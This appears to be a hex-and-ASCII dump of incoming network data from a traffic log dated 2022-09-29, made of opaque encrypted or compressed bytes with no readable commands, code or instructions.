                                                                                                                                                            2022-09-29 12:44:59 UTC5216INData Raw: a9 11 d8 2b e6 7c 43 2a 82 fc e2 85 ac d0 ac 1b 9c f8 ec 14 d7 d5 e7 7c 13 6f ce 70 cc e6 fd 8a 97 41 f6 be 8b e9 b4 6b 28 71 11 96 1f bf 5c 5b aa 08 02 43 fb 1e 20 5f 47 f8 96 e6 e1 ed 3c 50 9a 25 a6 5e 71 34 e5 89 e0 51 4e b5 27 42 33 43 e4 14 2a 7f ea 05 c4 35 34 c4 58 c3 4d b2 af 8f 86 39 e7 d0 f1 8a b7 ad ee b9 eb a4 a9 f2 50 ba 5b 2d a0 63 3c 3d 49 c0 46 37 9f c2 dd 52 40 57 d7 3a 5a 74 39 e4 3f 50 92 ab 66 42 59 2b e1 7f de 98 24 c1 82 2d 1c 97 30 5a a7 ef 5c 50 18 fc 22 b7 1d 46 cf 32 e9 3a 4b 2c 85 24 fb d0 4e b9 36 14 1a 05 70 2d 89 bc 6b 06 84 40 a5 55 12 ca 76 ae 70 10 6d 82 47 7f 48 1b f9 a4 4c ef e3 b9 39 e7 f3 31 fa 46 6e a1 13 c4 df 2e f4 89 ad 16 92 62 9d bc bc 23 d7 f7 11 fb 00 fe 57 74 b2 b8 aa 94 6e 90 d5 4f ff 60 e1 7a 46 b3 2e fa e7
                                                                                                                                                            Data Ascii: +|C*|opAk(q\[C _G<P%^q4QN'B3C*54XM9P[-c<=IF7R@W:Zt9?PfBY+$-0Z\P"F2:K,$N6p-k@UvpmGHL91Fn.b#WtnO`zF.
                                                                                                                                                            2022-09-29 12:44:59 UTC5232INData Raw: 70 24 1e f2 c7 99 0a e2 2b 53 c1 8d dd f1 ec 2f 81 4a b5 be 95 65 88 08 14 42 70 0b a1 b7 75 e2 75 9a 0e c3 60 f3 5e f5 66 20 e4 f9 90 a6 30 6f b9 e7 a6 ad 50 4e cb 89 dd fc e4 b1 de 5c 3d eb 5b 62 37 93 34 ed 8b 1a 99 d6 3e de 4d c8 d4 05 b9 bd e7 ee b7 0d 44 60 15 67 79 d7 91 9b 7f 60 19 5d a5 9f a2 04 98 e1 01 42 ef 00 36 29 3c 75 3e c3 7e c2 55 44 cf ff e4 e8 3f 12 4d 8c 6b 67 fd d9 68 65 e1 87 2d 17 b6 07 63 9d 4e 5b dd 44 61 b9 ae 67 20 7c f0 22 84 56 d1 8b 97 11 ea ee 21 58 4f 2e 01 01 8e be 35 39 bd bb e6 d4 b5 9e 05 cd b1 cb a1 88 ac 58 74 39 73 1f 29 1e c5 2e 0c d4 9e d5 97 6f e6 ab 63 1c 85 f1 30 a5 4a 20 e7 7c 92 55 e8 1e 8e 78 d6 c0 d4 26 78 bf 4c ae b3 5d 8a b0 93 d7 44 d8 1a 5e d3 0a 46 87 cc bd 03 f3 95 eb 9f e9 af 9e 1a 6a d3 09 a4 4f d8
                                                                                                                                                            Data Ascii: p$+S/JeBpuu`^f 0oPN\=[b74>MD`gy`]B6)<u>~UD?Mkghe-cN[Dag |"V!XO.59Xt9s).oc0J |Ux&xL]D^FjO
                                                                                                                                                            2022-09-29 12:44:59 UTC5248INData Raw: fa 4f 54 f4 0c a6 41 ef 84 39 ff 4c e9 11 66 84 79 95 45 99 d5 00 6d d3 32 03 3e 1a 5f 15 9f 86 58 2b 03 39 03 e2 d5 ee ed 70 a5 b3 e8 6c f6 59 ea f5 cc 9c ac c1 48 a8 98 25 b4 60 2d c7 dd 3d b8 dd 97 9b 32 9e 36 29 f7 fc a2 1e eb d0 ba 93 07 44 e5 65 f6 54 60 fd a9 8d 0b 85 be f4 27 f7 d2 6b fc 5b 79 00 fc 52 22 23 23 77 83 f9 00 7a 5d 08 7b a2 f6 58 12 d0 ba f0 84 f0 3d 72 ee ba e9 49 1c 6d c6 f4 8b 76 c2 ae 5e 12 d4 7a 2d 20 74 f3 a7 2b 78 e0 26 86 8d 28 9b a1 4f f6 3c 4d c0 cf ea ed 4e 71 a5 c9 e1 80 f8 a3 ec 94 ca 38 70 73 3c 60 37 01 4e d6 c5 bd ed c0 60 bc 13 ea de ec 40 ca 45 ed a4 c2 c5 ff ee cb 45 e4 15 29 94 46 5a f0 0e e2 7b 2c 38 bf d1 f7 ba 92 b8 7a 9f 49 be 17 8a f0 5c 77 55 b1 48 4a f6 d8 3d 79 e8 a4 6f 59 de 1a 08 24 c8 fc 10 58 73 5d a7
                                                                                                                                                            Data Ascii: OTA9LfyEm2>_X+9plYH%`-=26)DeT`'k[yR"##wz]{X=rImv^z- t+x&(O<MNq8ps<`7N`@EE)FZ{,8zI\wUHJ=yoY$Xs]
                                                                                                                                                            2022-09-29 12:44:59 UTC5264INData Raw: 56 d0 5d dc e4 85 79 19 89 bf a1 79 9a de 42 0f 1c 50 1b 74 fe f8 a1 19 f9 c3 28 ef b5 6e 0b f5 ca c3 f0 86 c8 7c 8b 7d a1 5c 07 5c 4b 54 7d 57 fd 04 e8 dd 48 31 6b 11 63 d9 3b eb c6 29 5b 2b 66 99 48 32 56 a9 0d 87 06 fa 64 0a f6 10 83 a9 33 ac 38 45 44 2f a6 2f 7c 63 0d 3c f6 eb 9c d7 50 c9 4d 90 3a 78 39 84 0f e5 2e 65 98 65 ee 87 a1 79 76 12 a7 67 ca 55 eb ed b8 17 a7 d7 8d 12 ee c6 89 d0 3c 93 1e 33 af 20 7b 92 96 6f fe d5 24 22 5f e8 38 49 89 8b c1 b4 19 01 34 f1 41 2e c1 a3 12 0c 43 28 54 77 b7 e0 33 5d e3 f4 f1 91 45 4b 38 15 7d f9 ce 64 a6 88 36 80 97 44 d6 d1 f3 86 19 76 66 11 8f e9 a6 d8 92 aa 46 b8 ee 4d 9e c0 47 86 9c 10 61 a4 a2 85 38 1a 47 7c 04 b5 ba d4 03 02 5f 6a 4b fa fb d6 86 8c dd 92 53 3f 54 17 f8 8b 2e e8 34 dc 12 0a 7d 5f 86 76 c1
                                                                                                                                                            Data Ascii: V]yyBPt(n|}\\KT}WH1kc;)[+fH2Vd38ED//|c<PM:x9.eeyvgU<3 {o$"_8I4A.C(Tw3]EK8}d6DvfFMGa8G|_jKS?T.4}_v
                                                                                                                                                            2022-09-29 12:44:59 UTC5280INData Raw: dc 0a aa b0 26 26 6f 41 1c ad a0 88 a6 7c f6 4f 00 df 7c 34 02 f3 ef fb b4 70 48 dd 1c 1a f2 60 ec cb 3b 20 bc 94 98 41 fa 38 92 0b d7 00 17 2a 21 f4 98 e9 f8 d5 81 46 58 94 11 17 54 84 c6 d5 98 6b 80 8a 1a 3c fb b7 f9 fc e7 d5 b7 88 4e f6 56 39 e8 ef 32 98 65 eb c5 b1 af 41 6a 3d e1 e6 f1 9f 0a 7a 07 a8 f6 54 67 66 5d 2f 6f bb 6a 8e 10 06 e8 e7 7e 32 83 98 64 ae 2a 7b 2b b6 f3 76 90 8a 7a ed 5b 37 15 49 f1 99 a7 7b 87 88 28 6d a4 53 ba 97 d4 85 fa 38 fd 75 0e c6 87 14 bc c6 c4 30 9c 5e f8 b8 4d 03 af c7 ab ec ec 1d 23 ba 5f af eb 9e 16 c4 a3 57 1d be 02 b4 3a 61 8c 3c c1 aa fa f4 15 81 3b 17 dc fe f7 76 d7 22 da 30 52 9e 09 3a be db cc e1 0d 87 15 51 62 9c 67 d5 83 1e 94 a9 d4 f6 32 7d 76 d0 b7 dd e1 c3 e7 19 a2 86 0e 86 93 c8 e9 45 0f 57 bb 72 d9 21 8f
                                                                                                                                                            Data Ascii: &&oA|O|4pH`; A8*!FXTk<NV92eAj=zTgf]/oj~2d*{+vz[7I{(mS8u0^M#_W:a<;v"0R:Qbg2}vEWr!
                                                                                                                                                            2022-09-29 12:44:59 UTC5296INData Raw: bf a8 fa 8e db dd 1e 64 dc 56 25 bc fc 35 a6 10 59 fa 9f 8f 94 1f af fc af 00 ef c6 b6 53 9b 57 05 3e d9 ce ca dc 00 22 89 a8 4d 34 b2 ca 65 6a 5e 1e f3 28 18 30 ce dd dc 97 4e 38 b1 f2 5d 78 f1 b6 a2 e0 63 5c 1c d7 dd 8f 96 22 27 aa 7a 72 67 d0 31 68 0d 76 06 9a ab 17 f5 fe 19 08 33 4b 36 7e 18 6a a7 fa 11 a6 bd aa 86 f5 c6 b9 3c 3e e0 8d bf 6f 41 6a 68 46 e2 95 a9 2c 93 4f 2c ab 84 65 1e db 63 a3 05 e0 a0 78 69 9d 0f 8e c6 df 7f 91 31 e8 6d 4c 38 cb 34 34 c9 f9 b7 41 5d 79 dd 63 2c ca 6c ad 63 9c ea 02 87 d5 82 9d 01 95 32 68 a5 c8 56 72 84 f0 80 d7 04 70 a9 c6 7c a8 ae 2b b3 16 87 4e 51 41 46 8d 47 d9 51 7d 7e ad f2 8f 48 7b 3b 84 72 33 8e 3e d3 65 ad 28 81 81 df 3a 50 23 7c ef bc 28 24 1c 19 86 ce 2e 24 67 f4 cf e7 5c 9f 64 db d2 0f 87 c2 b5 3b 47 0f
                                                                                                                                                            Data Ascii: dV%5YSW>"M4ej^(0N8]xc\"'zrg1hv3K6~j<>oAjhF,O,ecxi1mL844A]yc,lc2hVrp|+NQAFGQ}~H{;r3>e(:P#|($.$g\d;G
                                                                                                                                                            2022-09-29 12:44:59 UTC5312INData Raw: d7 83 74 e5 fd 61 13 14 0f cc 96 f0 ba d2 45 e0 aa a5 22 23 3e a4 f8 89 ca 6a e6 4b ba e8 84 d1 b8 33 59 75 8e 47 3d fb e6 17 2d ce 96 dc 8a 96 49 ab ff b4 83 b9 97 16 f0 5a 74 e7 01 0d e6 47 9c 64 be c9 34 e7 e7 7e 3f 55 23 86 c9 cb a3 57 30 8e dc ac 68 87 a1 78 80 65 0e 42 f1 53 07 6b e4 ed 92 39 7e b8 7a 72 65 ab 94 07 ca fa 91 7b 76 31 65 5b e4 5d 9f 6b aa 11 1e 21 bf 7c 74 36 c0 f2 f2 47 38 5b 17 45 bf 4b b4 58 f3 67 72 19 90 a4 41 59 7c a9 86 3e 43 f6 64 b1 3d 10 1b 48 47 1f e5 49 e7 d2 65 b3 69 0c b5 0f e1 33 f8 97 80 fc 89 ce 83 9b 3a 2c 50 c9 83 55 46 3b 98 e8 4a 40 76 cb 25 f4 d8 66 11 aa d0 d7 d5 24 f3 07 e9 c3 d6 d6 7d fe 8d cf 09 88 cb f4 e4 d5 c0 86 c9 8d df 8b c7 ff 96 45 4c f4 f3 08 f9 d8 ce 1e c5 b7 02 e6 ab 9e cb ec a9 e6 4d 2b b6 92 02
                                                                                                                                                            Data Ascii: taE"#>jK3YuG=-IZtGd4~?U#W0hxeBSk9~zre{v1e[]k!|t6G8[EKXgrAY|>Cd=HGIei3:,PUF;J@v%f$}ELM+
                                                                                                                                                            2022-09-29 12:44:59 UTC5328INData Raw: a1 57 d0 0b d2 0f 71 32 4b d2 1a 08 fe 1b ce 78 95 ba 63 c1 44 57 21 45 5d d5 83 e9 f8 fd 98 b4 ac e2 e3 c9 79 60 49 6d 09 ea ce 18 c6 a4 12 99 e2 7f c9 08 f8 38 64 63 fe 01 02 51 9c c0 74 a0 1a ec 4b 3b 43 58 b1 a3 8c cf d1 e9 b8 ce a4 58 9c c9 5d e7 9b 64 12 fa e8 e7 58 3d 62 9b ce 4a 93 6b da 0b e7 4a a3 8f ec 48 13 ac b6 02 3c 4e 8a e0 b1 fb 38 bd 20 ea 33 34 4b a5 ae 04 91 77 e1 29 4a 0e 75 66 29 d6 56 b2 f5 fc 8e 8d 52 15 28 fa e5 f4 18 32 e5 91 2c 1d 28 c2 94 bd 54 cc 7f f1 9f b6 65 ef 30 a3 b2 51 6e d5 a6 3c 44 17 1e 44 1f bf 8d 04 40 66 71 04 32 3b 5f 3f cb 15 d1 fd 2e 60 43 dc b3 e2 e3 82 b3 8a 0c 64 7c 71 34 78 e4 dc 28 bc 1a cf eb 87 4b cb 15 1c 71 9b b1 76 71 c1 ae 80 9a 46 97 cf da a1 97 20 b1 da ec 25 7b d9 47 bc 21 3a c1 ed bf 5c e6 c3 da
                                                                                                                                                            Data Ascii: Wq2KxcDW!E]y`Im8dcQtK;CXX]dX=bJkJH<N8 34Kw)Juf)VR(2,(Te0Qn<DD@fq2;_?.`Cd|q4x(KqvqF %{G!:\
                                                                                                                                                            2022-09-29 12:44:59 UTC5344INData Raw: b5 3d d4 ba f9 fd 19 5b 3c 98 c8 86 98 b8 73 c3 db 0f cb a6 3b 22 33 a4 93 cd a5 a3 ef ad c3 cb 0e 79 93 6d da 02 ee 4a 46 a9 73 b2 ea 3d 7f 30 8f 44 1d 50 c7 c4 a4 d8 58 0a f2 ae bd 40 87 d7 7d 76 63 9f d0 3d 91 8b 03 c7 6d e1 c8 62 c9 a2 2b ec 57 e9 ae ec 01 7a 3c c9 9a 9d a8 68 a3 72 6f 16 70 25 d9 46 a0 78 7f 5b bb 1d 33 37 fe 4a 28 f6 79 47 02 50 92 35 14 c2 1a 0b 30 48 82 26 e4 91 9c 75 a7 17 5a 93 3a cb 8e 63 8a 7e 94 b6 50 c8 71 b0 c2 37 72 33 75 06 f2 5f c7 98 7a 3c 4d 7f f0 d3 49 52 bb 10 42 10 2a cd 84 3d 61 8b 5c 75 87 10 4d 4d ec 0a b8 0b 33 0f 5b 6b 0c 12 0b da 3b 81 17 2e 8c 8e ed 68 2e 0f 94 21 5c 8f 1c 3f 6f 2c 5d 95 61 ed a1 97 43 24 21 2c de ce a4 41 61 45 3c ac 75 03 83 b9 4c 26 ce e2 38 b8 9a 20 91 29 b3 b0 4e 4c 67 f6 8b 8d 47 8c 19
                                                                                                                                                            Data Ascii: =[<s;"3ymJFs=0DPX@}vc=mb+Wz<hrop%Fx[37J(yGP50H&uZ:c~Pq7r3u_z<MIRB*=a\uMM3[k;.h.!\?o,]aC$!,AaE<uL&8 )NLgG
                                                                                                                                                            2022-09-29 12:44:59 UTC5360INData Raw: 59 6a 95 92 64 d2 b2 93 21 d5 b4 84 5e e8 0f ae d5 63 53 cd f2 46 b9 fc d2 11 f1 86 83 83 32 3f f3 a8 75 2a 64 3f fe 84 52 ea 91 d8 d3 c2 16 2d b8 64 05 1f 1a 19 67 98 e9 12 e6 a6 b0 97 64 6e d2 d5 90 93 2b 02 56 bb f1 82 2f 93 6e f3 09 ce 15 8c a6 6d 8c d1 64 c8 56 e8 a3 7e 30 3b a0 be 27 ad 2a ef 7b af 1a 46 8a 43 d7 fd 66 f0 1b 77 20 a9 45 cf 6d d7 8d 79 fd 1c 41 57 b3 13 19 73 bf 14 75 a6 12 23 59 27 4c 47 67 b1 38 3b 09 3b 72 0f 80 ae e4 92 0b 82 44 90 6e d1 d7 f2 ae c2 e1 40 4a 41 51 a1 da a9 74 3a cf 29 51 5d eb e5 9e 6f c8 e6 21 e1 3e 68 bb d8 4d 82 9e a2 77 54 b4 6e ad e6 dc 63 14 68 eb c3 fd 94 a0 48 c9 2c a3 4e dd 9c ed 1c fe d8 03 64 f8 0a 9e b8 bb ff 7a 70 68 09 c1 a6 e0 a2 29 e8 01 39 2f b8 e0 48 6e f2 4d ba 5d e3 7d b5 3f 3c cd 91 7d 64 47
                                                                                                                                                            Data Ascii: Yjd!^cSF2?u*d?R-dgdn+V/nmdV~0;'*{FCfw EmyAWsu#Y'LGg8;;rDn@JAQt:)Q]o!>hMwTnchH,Ndzph)9/HnM]}?<}dG
                                                                                                                                                            2022-09-29 12:44:59 UTC5376INData Raw: 76 34 aa e9 f2 e1 db e1 84 85 17 87 a5 6f 85 be 03 46 5a ec 71 a1 e0 dc c6 f9 36 c7 3e fc 94 a5 09 0c 35 6c 58 b6 25 5f 66 c8 58 1c 81 0e 1b c1 6d fc 5c 2f da 31 b0 f3 66 1c 0f 65 54 b9 03 17 43 ef 18 59 29 ea ee d5 f8 cd ed a3 d4 53 2a d0 4c 0e 4b 33 ba 5f 42 43 28 2b c8 99 f5 e8 5b 85 66 87 42 d8 94 18 fe af c9 a4 6c 79 7a c1 c3 36 99 e1 02 63 87 e2 2d b7 86 9b 1b b5 1f a7 36 cb 84 00 6e 42 8b 8d 1e de 2f 8b 0b 12 78 f3 60 83 67 cc 22 1c e5 0c 7d 80 64 a7 95 9a cc ed 96 43 22 6d fe 1e 76 8a 4c 2c 34 25 db b1 c9 fd 0a 1a fb a6 18 86 bd a7 e9 91 7c fb 84 d3 a1 e9 f9 ea 1b 6d be b6 5e 0e 31 e1 1e 59 41 39 46 b8 7f 2e b4 12 73 a0 d9 14 bf 99 f0 68 7e ff 1f b5 29 ef f5 68 42 06 cd 04 71 ad c4 8f 46 db 19 22 f3 af 21 ee 76 02 ee 0d 58 57 42 e8 1e 32 e1 a8 18
                                                                                                                                                            Data Ascii: v4oFZq6>5lX%_fXm\/1feTCY)S*LK3_BC(+[fBlyz6c-6nB/x`g"}dC"mvL,4%|m^1YA9F.sh~)hBqF"!vXWB2
                                                                                                                                                            2022-09-29 12:44:59 UTC5392INData Raw: 22 4d 66 5a 56 bc db 36 eb b0 c1 59 dd b0 a4 f7 88 91 18 fe 7f 8a e2 7c 00 3b 9f 35 e5 ee 41 18 13 ed d6 84 80 c9 d3 fd 4c c5 68 49 19 d0 1e 27 5b b6 c6 6e 5e 1c 6e bb f2 47 ee 8c db 7d e5 25 33 6a a0 6c 46 1e 24 f7 d2 f6 52 03 56 a0 06 4a 63 ca 69 de 3a 04 ac d8 2f ed db 85 a1 2b 13 67 cd ec 33 80 de 37 30 bf c2 e8 63 49 b0 9e 87 16 41 04 85 18 ea db 8c f5 d7 15 85 7c c2 05 72 99 d4 a5 21 0d 81 47 66 31 25 61 a5 3d 76 8a 72 74 e0 69 e6 a2 2c ab 89 83 50 ef 28 8b e4 4c 2d d5 0b a8 95 30 15 c6 ee cd 08 86 e9 c7 5b cd 37 5d 46 55 c5 18 04 e3 fd 62 38 6d 19 86 a3 8c a5 ac 1e e1 67 48 c9 ba 9a 34 b6 84 1c e3 eb e1 12 ab 69 27 67 ad ea e1 bc 9a 5a cb 73 e6 dc 72 91 4f 14 9f e1 19 5c 2a 0d 99 05 cc 36 24 e2 67 52 e4 3e 5f 16 55 ad 34 3b 62 b7 1e 19 91 83 0c e9
                                                                                                                                                            Data Ascii: "MfZV6Y|;5ALhI'[n^nG}%3jlF$RVJci:/+g370cIA|r!Gf1%a=vrti,P(L-0[7]FUb8mgH4i'gZsrO\*6$gR>_U4;b
                                                                                                                                                            2022-09-29 12:44:59 UTC5408INData Raw: 0e eb cc 1e 72 5f ce ca a1 1f 85 ae 8c 7f bc d6 56 71 00 c6 74 0e 56 f7 5c 0f 4a 7d e7 4a dd e0 09 dd f9 fa 6f ba 2f 59 f5 23 b0 12 e9 43 bb 17 69 c8 fc 05 d5 c1 7b bd 2e 8c 4b df d7 4c 0c 40 aa 28 f8 d8 67 7d 9b c4 fd fb 83 9f 0c a7 72 e6 9a 08 55 79 84 0c e8 6e 98 30 11 c4 10 d8 f8 11 9a 29 24 e0 1f 80 9e 8f f8 c2 7f 2e ae 6f 20 59 99 14 13 87 22 a2 ad 25 51 e4 0a af a0 61 fe e3 80 34 3a ed cc c7 7d 0c 7e 77 17 63 f9 9c 4f 3f ad 59 34 1c d8 4a 21 41 26 db c1 e2 a9 28 4c c2 04 11 b5 f2 0e aa b5 84 88 6a 57 0a a4 d3 af 4d b1 5d 60 56 aa 1b 2d d5 a6 61 71 52 95 eb 4b db 63 35 94 f6 f6 7a 64 0c d3 e8 2b a4 1a c7 b5 75 83 b6 14 cb d0 98 af 54 e6 48 cc e2 61 9c c7 58 b3 54 c4 28 f7 ff a6 9e 9e fd 90 46 b9 4a 4f 11 84 1f 80 92 53 f3 58 c1 46 c8 88 88 3d 79 7b
                                                                                                                                                            Data Ascii: r_VqtV\J}Jo/Y#Ci{.KL@(g}rUyn0)$.o Y"%Qa4:}~wcO?Y4J!A&(LjWM]`V-aqRKc5zd+uTHaXT(FJOSXF=y{
                                                                                                                                                            2022-09-29 12:44:59 UTC5424INData Raw: af d1 b1 51 db 89 f9 15 d6 80 3d df e6 f5 0a 78 0a a1 f9 02 6e 04 9b 5d 9c d2 11 bb 78 99 d1 59 09 33 47 2a 0d d8 68 03 01 82 bc c9 62 58 f2 e9 6c df a3 6d f7 74 a8 7f 4c 4a 66 3c 71 73 e2 f9 34 24 2b c7 bd c0 b2 42 2d ae 71 8f 0d 3f b6 6e 88 1f 51 25 6f a1 62 6f 81 05 b1 aa 82 bd 64 de 8e b7 4f 52 ed 4a b4 22 56 6c 5d 36 af c8 a6 bc 3e 10 35 9d 7b 96 de fb d1 72 b3 0f 92 1f a7 08 d3 0f a1 74 d8 71 c9 89 3e 71 9c 9e 5e ee 19 b5 33 a5 9e 87 7c 78 cc 1c 7c 32 d2 45 f9 87 8f 19 2e 35 18 14 1a ec 91 29 dc ba bd 0c 09 f3 4d 8b c6 86 18 71 75 32 78 bd fa d1 81 88 ae b4 c5 14 97 6a 4e e1 d9 a3 c7 58 05 7c 81 c8 a5 03 1a da 76 b4 dc 3c 1b 9e bf 53 20 5a 4c aa 8b 0a 17 37 76 5b bf d8 30 e1 a5 26 3a 72 ad 62 f2 c9 f5 ff ad dd 3c c5 2b d6 b1 f7 01 e0 a4 03 01 db 73
                                                                                                                                                            Data Ascii: Q=xn]xY3G*hbXlmtLJf<qs4$+B-q?nQ%obodORJ"Vl]6>5{rtq>q^3|x|2E.5)Mqu2xjNX|v<S ZL7v[0&:rb<+s
                                                                                                                                                            2022-09-29 12:44:59 UTC5440INData Raw: 46 10 6c 53 c2 a5 ae 81 2d c7 94 5d 32 f1 45 17 20 e6 21 92 db e4 3e a7 40 05 21 16 86 04 09 a1 5d d3 84 36 f1 35 53 1d 94 75 34 2d e4 bb 5e 4c 39 bd 89 92 ce 8e 1d a1 f3 4e fb a1 de 78 b9 60 ac e3 a4 40 11 cd e4 f7 3a 94 3d ea fa f4 53 5b 00 76 b6 33 b6 29 6a 91 43 98 85 ed 8c 8e 17 78 af d7 5d 37 76 36 ec b6 e9 43 bf f0 36 11 18 db 7e fe b9 7d 20 a5 25 ee fb 2a 10 8c 43 15 5d e0 6d d7 04 b6 d5 a9 e4 0e db f0 bd d0 3f 1b 55 ec 08 e9 63 48 d6 b0 27 c4 ab 1b b6 61 c3 bc f6 e4 56 eb 78 9d af 07 d0 1c 71 58 2f 28 28 01 ee 45 e9 87 97 04 2a c0 b5 a6 af a0 db 59 9f 51 63 41 07 25 29 0c 03 16 97 8e 9b 2c e3 5d 88 5c c3 1e 95 18 f5 54 ac 5c 6e a2 3e 36 8e 64 5b b7 63 1c 18 0e 60 93 6b 68 31 d4 16 45 98 7a a9 91 d2 46 35 82 8f 16 23 89 51 69 1d 22 31 45 2e cb 0b
                                                                                                                                                            Data Ascii: FlS-]2E !>@!]65Su4-^L9Nx`@:=S[v3)jCx]7v6C6~} %*C]m?UcH'aVxqX/((E*YQcA%),]\T\n>6d[c`kh1EzF5#Qi"1E.
                                                                                                                                                            2022-09-29 12:44:59 UTC5456INData Raw: 4a 3d 2c c4 81 9a 4c 7c 0f 66 61 81 1e b6 88 fc 44 b2 4e 0a 46 8e 1e 81 aa f4 cf 7c 1c 30 85 d1 13 86 24 e1 8d c3 9a b4 78 9d 68 db 67 48 8f 45 41 28 41 fe b8 4d ef 69 c9 1c bc 1e 6e 71 24 73 08 70 0a 6a 37 20 b6 8e 61 f4 02 91 80 e1 eb 86 7a 5c b7 0e ff aa c5 d9 2a 2d 12 18 ac 92 d9 dd 58 67 82 f7 4c 09 c7 57 ae 74 26 63 75 13 6d 3d 82 e1 e5 ce 15 ce 53 18 f1 ae 89 b4 57 42 b3 a4 dd 96 7e 81 9c a0 f2 fb 4b 2b 50 64 db fe ec 9b 19 b2 36 2e 89 99 26 90 b3 7e 43 4e 91 2f 46 85 7a f5 d1 d8 48 ec 70 22 fc e5 ec a6 90 f6 5b ad ec ce 30 02 67 47 dd 18 b9 69 4c 72 26 a9 5a 65 27 da cc f8 a3 45 73 ea ed d1 a1 f6 d4 60 47 21 72 5f f5 4b fb 72 31 99 ff 49 0a ef 06 14 7d 98 db 39 04 11 c3 c7 ec 7b 3d 67 1a 29 41 98 c7 ef 40 76 c7 7f c7 4a bc 2b 38 95 5a 32 60 79 66
                                                                                                                                                            Data Ascii: J=,L|faDNF|0$xhgHEA(AMinq$spj7 az\*-XgLWt&cum=SWB~K+Pd6.&~CN/FzHp"[0gGiLr&Ze'Es`G!r_Kr1I}9{=g)A@vJ+8Z2`yf
                                                                                                                                                            2022-09-29 12:44:59 UTC5472INData Raw: 24 72 e6 cd 08 4e e8 9e c3 ad ed 66 ff aa c1 cf 66 45 a2 0a f4 d2 cd c6 ef 37 68 6d a6 d1 c3 9c 40 14 d5 4e 19 f3 be 40 d8 23 2e c1 86 08 64 bd b5 dd 97 79 d6 5d 56 35 1e a2 29 a1 c7 ba 23 ee ee dd 9d 5b 73 b1 89 af 1d c2 6b b7 ba 4e 1c 7b 51 b8 36 bc 5a a5 3b 92 7c 9a cf 0d 08 96 6c a2 ee bd a3 68 4b 00 89 e7 05 a2 7a 3d c0 11 dd 47 64 ba ff b0 0c f1 9f d1 ce 5f 1d 8e e3 60 42 bb 2a 9e 12 f8 5b 2e 03 17 1c 65 de 04 0f 27 2e 68 4e 60 3b 97 5c 5e c5 43 03 69 aa f6 64 fb d0 32 89 7a a6 9c 3e b5 72 8e 0f ba ab e6 d5 5e 1c 0b ad f9 7e af b0 7b df 6e 72 4e 33 49 8e 64 be a2 1b 95 61 b7 4f d6 ed cd bd 45 4f 80 a4 97 b0 8a de fc 3b 5b 3e e7 d2 80 2a cc f0 81 11 2a 77 c1 47 05 2e 62 8f e1 67 80 f9 22 b3 6a 40 dd 4a 60 b6 f2 20 3b 9d 36 8a 15 5c fc fe b9 1b b6 cd
                                                                                                                                                            Data Ascii: $rNffE7hm@N@#.dy]V5)#[skN{Q6Z;|lhKz=Gd_`B*[.e'.hN`;\^Cid2z>r^~{nrN3IdaOEO;[>**wG.bg"j@J` ;6\
                                                                                                                                                            2022-09-29 12:44:59 UTC5488INData Raw: 2c b8 8f ec fa 5b 15 29 3c 1d 51 b2 8c c9 7f 4b fc a0 a5 0d a7 59 b2 8b 61 63 fb 5a f0 a9 e6 d2 c7 d9 1a 07 65 67 7e 09 2b 2a 57 db cf 03 1a 64 71 77 d6 b5 e9 f9 ce 69 2c b0 4e e6 7a 64 d5 ef 0a 46 b0 32 fb f0 08 42 09 e5 2f 30 94 f7 eb 7d a7 5b 6d 22 5a 86 5a 6a 3a 24 5e 2d ae eb c2 6b 07 48 c8 12 b3 a3 a0 74 f0 ef af 48 30 d9 a6 79 f1 81 eb 3e 26 69 ad 75 7b ac ff 60 b3 80 b7 85 f0 61 ae 94 12 0d 51 bf 2a b8 a2 3a 24 a3 07 6b 48 52 22 37 02 d2 0e f1 57 63 b0 0c 60 40 f1 72 51 22 84 dc e5 b5 d5 7b 35 dd ed b9 df a2 e8 b5 51 89 fe ab dc 07 bd fb 86 49 f1 d1 b3 51 7b ed 13 8b 30 91 60 f0 53 ef 31 87 c2 85 2c b6 80 3d 34 89 0f a2 4c b0 87 73 53 88 19 dc 0c 30 6e b1 c7 77 67 93 86 cc 34 1a 10 7f 44 5b 35 3a a3 39 1f c5 83 72 2a 77 b7 34 3f c3 c2 ab 3a 73 5d
                                                                                                                                                            Data Ascii: ,[)<QKYacZeg~+*Wdqwi,NzdF2B/0}[m"ZZj:$^-kHtH0y>&iu{`aQ*:$kHR"7Wc`@rQ"{5QIQ{0`S1,=4LsS0nwg4D[5:9r*w4?:s]
                                                                                                                                                            2022-09-29 12:44:59 UTC5504INData Raw: ed 10 0a 26 d9 19 d7 2c a2 63 8c 2e 82 50 b0 bf 06 16 79 17 c0 f5 e8 92 ed 61 a9 e5 87 59 fb 2f 7a 01 86 ad 75 8e 98 5e e5 b2 90 e4 20 82 64 93 4f 91 1b 56 25 e0 0d 45 45 bf 4e 38 04 f3 6b 0c af 02 af be 62 cc 25 bf 24 9b 82 dd 22 70 55 53 de 1d 6c a2 4c d5 e9 d7 34 87 ee ce 6a c2 d8 99 84 15 a2 14 18 63 62 8a be b5 4f d8 9a 2d 9a 59 a9 40 e4 55 b3 33 14 dc 4e f2 83 25 8a 37 c1 96 fa c6 98 9a 7f c9 6b 40 37 60 c8 c5 c3 e7 15 22 45 ca 83 30 a1 b2 6a 5a d2 3e 85 7b a5 e2 00 ad 50 70 8c a8 c2 c7 17 02 fc df 71 87 da 41 dd d6 e8 a3 04 95 a7 f4 32 52 3d bc 76 9f 57 80 e3 66 63 94 5b 28 0e 67 73 1e b8 c3 fe 6d 57 5f 57 ef 5b e9 56 c7 59 95 59 b1 c0 7d 7d b1 c1 0e 33 de 84 cd be 57 6a e1 dc 31 14 d4 22 c6 ce e3 f2 09 91 87 2c 28 18 99 61 56 4c 9a 65 50 7a 38 13
                                                                                                                                                            Data Ascii: &,c.PyaY/zu^ dOV%EEN8kb%$"pUSlL4jcbO-Y@U3N%7k@7`"E0jZ>{PpqA2R=vWfc[(gsmW_W[VYY}}3Wj1",(aVLePz8
